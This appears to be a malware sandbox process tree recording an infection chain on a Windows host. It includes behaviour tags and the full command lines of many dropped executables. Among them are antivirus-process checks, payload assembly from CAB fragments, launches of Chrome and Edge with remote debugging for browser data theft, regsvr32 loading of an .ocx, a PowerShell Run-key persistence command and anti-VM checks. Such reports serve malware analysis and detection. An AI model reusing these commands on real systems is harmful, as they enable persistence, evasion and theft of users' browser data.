C:\Users\Admin\AppData\Local\Temp\{4bc04756-e244-4919-89b1-62348f4dd3b3}\11565d81.exe"C:\Users\Admin\AppData\Local\Temp\{4bc04756-e244-4919-89b1-62348f4dd3b3}\11565d81.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot6⤵PID:9444
-
C:\Users\Admin\AppData\Local\Temp\{3ad26fed-ad25-43ad-9efa-5da049c14a5c}\06b2ada7.exeC:/Users/Admin/AppData/Local/Temp/{3ad26fed-ad25-43ad-9efa-5da049c14a5c}/\06b2ada7.exe -accepteula -adinsilent -silent -processlevel 2 -postboot7⤵PID:5228
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:1912
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
PID:1324
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵
- System Location Discovery: System Language Discovery
PID:2112
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵
- System Location Discovery: System Language Discovery
PID:2208
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵
- System Location Discovery: System Language Discovery
PID:884
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵
- System Location Discovery: System Language Discovery
PID:5152
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵
- System Location Discovery: System Language Discovery
PID:4828
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3540
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:1800
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5408 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 5165⤵
- Program crash
PID:1188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10340260101\b60fb80332.exe"C:\Users\Admin\AppData\Local\Temp\10340260101\b60fb80332.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6588 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:6660
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:6684
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6712
-
-
-
C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7048
-
-
C:\Users\Admin\AppData\Local\Temp\10359660101\xZRvIQ5.exe"C:\Users\Admin\AppData\Local\Temp\10359660101\xZRvIQ5.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7192 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5112
-
-
-
C:\Users\Admin\AppData\Local\Temp\10360100101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10360100101\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:7788 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7952 -
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8428 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:8584
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:8604
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:11544 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1916 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
PID:11112 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x40,0x220,0x224,0x1fc,0x228,0x7ff874fedcf8,0x7ff874fedd04,0x7ff874fedd108⤵PID:6084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1604,i,11176117438495484718,4176166069013631572,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1952 /prefetch:38⤵PID:12580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2024,i,11176117438495484718,4176166069013631572,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2020 /prefetch:28⤵PID:12608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2420,i,11176117438495484718,4176166069013631572,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2564 /prefetch:88⤵PID:12740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,11176117438495484718,4176166069013631572,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3252 /prefetch:18⤵
- Uses browser remote debugging
PID:12860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,11176117438495484718,4176166069013631572,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3296 /prefetch:18⤵
- Uses browser remote debugging
PID:12872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4280,i,11176117438495484718,4176166069013631572,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4300 /prefetch:28⤵
- Uses browser remote debugging
PID:13016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,11176117438495484718,4176166069013631572,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4636 /prefetch:18⤵
- Uses browser remote debugging
PID:13268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4808,i,11176117438495484718,4176166069013631572,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4924 /prefetch:88⤵PID:7040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5424,i,11176117438495484718,4176166069013631572,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5436 /prefetch:88⤵PID:7228
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
PID:10500 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x268,0x26c,0x270,0x264,0x23c,0x7ff875f0f208,0x7ff875f0f214,0x7ff875f0f2208⤵PID:10464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2244,i,17590947324315662040,14190040763799294221,262144 --variations-seed-version --mojo-platform-channel-handle=2240 /prefetch:28⤵PID:11324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1896,i,17590947324315662040,14190040763799294221,262144 --variations-seed-version --mojo-platform-channel-handle=2272 /prefetch:38⤵PID:11300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2352,i,17590947324315662040,14190040763799294221,262144 --variations-seed-version --mojo-platform-channel-handle=3116 /prefetch:88⤵PID:11656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,17590947324315662040,14190040763799294221,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:18⤵
- Uses browser remote debugging
PID:12084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3456,i,17590947324315662040,14190040763799294221,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:18⤵
- Uses browser remote debugging
PID:2608
-
-
-
C:\ProgramData\qimg47gdb1.exe"C:\ProgramData\qimg47gdb1.exe"7⤵PID:2160
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:4516
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:12208
-
-
-
C:\ProgramData\cjw47qi5fc.exe"C:\ProgramData\cjw47qi5fc.exe"7⤵PID:12200
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:11572
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""9⤵
- Uses browser remote debugging
PID:24900 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff88384dcf8,0x7ff88384dd04,0x7ff88384dd1010⤵PID:25004
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11572 -s 13129⤵
- Program crash
PID:3888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11572 -s 13849⤵
- Program crash
PID:7512
-
-
-
-
C:\ProgramData\26fuaa16xl.exe"C:\ProgramData\26fuaa16xl.exe"7⤵PID:11300
-
C:\Users\Admin\AppData\Local\Temp\kpF79yep\vatWkPiUMiZpbnWV.exeC:\Users\Admin\AppData\Local\Temp\kpF79yep\vatWkPiUMiZpbnWV.exe 08⤵PID:12076
-
C:\Users\Admin\AppData\Local\Temp\kpF79yep\ioXdcBLF3m5r6EnC.exeC:\Users\Admin\AppData\Local\Temp\kpF79yep\ioXdcBLF3m5r6EnC.exe 120769⤵PID:6976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 68010⤵
- Program crash
PID:18836
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12076 -s 7169⤵
- Program crash
PID:24908
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\kx4op" & exit7⤵PID:24884
-
C:\Windows\SysWOW64\timeout.exetimeout /t 118⤵
- Delays execution with timeout.exe
PID:25500
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"5⤵PID:8104
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:8488
-
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"5⤵PID:3236
-
C:\Users\Admin\AppData\Local\Temp\is-1DCS9.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-1DCS9.tmp\Bell_Setup16.tmp" /SL5="$B0044,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"6⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT7⤵PID:5772
-
C:\Users\Admin\AppData\Local\Temp\is-BO0IP.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-BO0IP.tmp\Bell_Setup16.tmp" /SL5="$C004C,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT8⤵PID:5008
-
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"9⤵PID:6344
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"10⤵
- Command and Scripting Interpreter: PowerShell
PID:4372
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -NoProfile -NonInteractive -Command -10⤵
- Command and Scripting Interpreter: PowerShell
PID:7908
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"10⤵
- Command and Scripting Interpreter: PowerShell
PID:8432
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"5⤵PID:12508
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe6⤵PID:6596
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe7⤵PID:6788
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe8⤵PID:7160
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe9⤵PID:6772
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe10⤵PID:6028
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport_platform.exe"11⤵
- Modifies registry key
PID:7268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe\"'"11⤵
- Command and Scripting Interpreter: PowerShell
PID:7624
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"5⤵PID:10156
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:400
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:11308
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043090101\1a12bd6a10.exe"C:\Users\Admin\AppData\Local\Temp\10043090101\1a12bd6a10.exe"5⤵PID:5512
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043090101\1a12bd6a10.exe"6⤵PID:240
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043100101\c99b02ada0.exe"C:\Users\Admin\AppData\Local\Temp\10043100101\c99b02ada0.exe"5⤵PID:10988
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043100101\c99b02ada0.exe"6⤵PID:25228
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10360180101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10360180101\bot.exe"3⤵
- Executes dropped EXE
PID:9100 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe4⤵
- Executes dropped EXE
PID:9456 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe5⤵
- Executes dropped EXE
PID:9772 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe6⤵
- Executes dropped EXE
PID:9924 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe7⤵
- Executes dropped EXE
PID:10028 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe8⤵
- Executes dropped EXE
PID:10156 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe9⤵
- Executes dropped EXE
PID:10328 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe10⤵
- Executes dropped EXE
PID:3616 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe11⤵
- Executes dropped EXE
PID:10540 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe12⤵
- Executes dropped EXE
PID:10816 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe13⤵
- Executes dropped EXE
PID:11168 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe14⤵
- Executes dropped EXE
PID:11292 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe15⤵
- Executes dropped EXE
PID:11380 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe16⤵
- Executes dropped EXE
PID:11656 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe17⤵
- Executes dropped EXE
PID:11800 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe18⤵
- Executes dropped EXE
PID:12008 -
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe19⤵
- Executes dropped EXE
PID:5464 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe20⤵
- Executes dropped EXE
PID:5108 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe21⤵
- Executes dropped EXE
PID:12300 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe22⤵
- Executes dropped EXE
PID:236 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe23⤵
- Executes dropped EXE
PID:1876 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe24⤵
- Executes dropped EXE
PID:3096 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe25⤵
- Executes dropped EXE
PID:4296 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe26⤵
- Executes dropped EXE
PID:1196 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe27⤵
- Executes dropped EXE
PID:12648 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe28⤵
- Executes dropped EXE
PID:12776 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe29⤵
- Executes dropped EXE
PID:6124 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe30⤵
- Executes dropped EXE
PID:5568 -
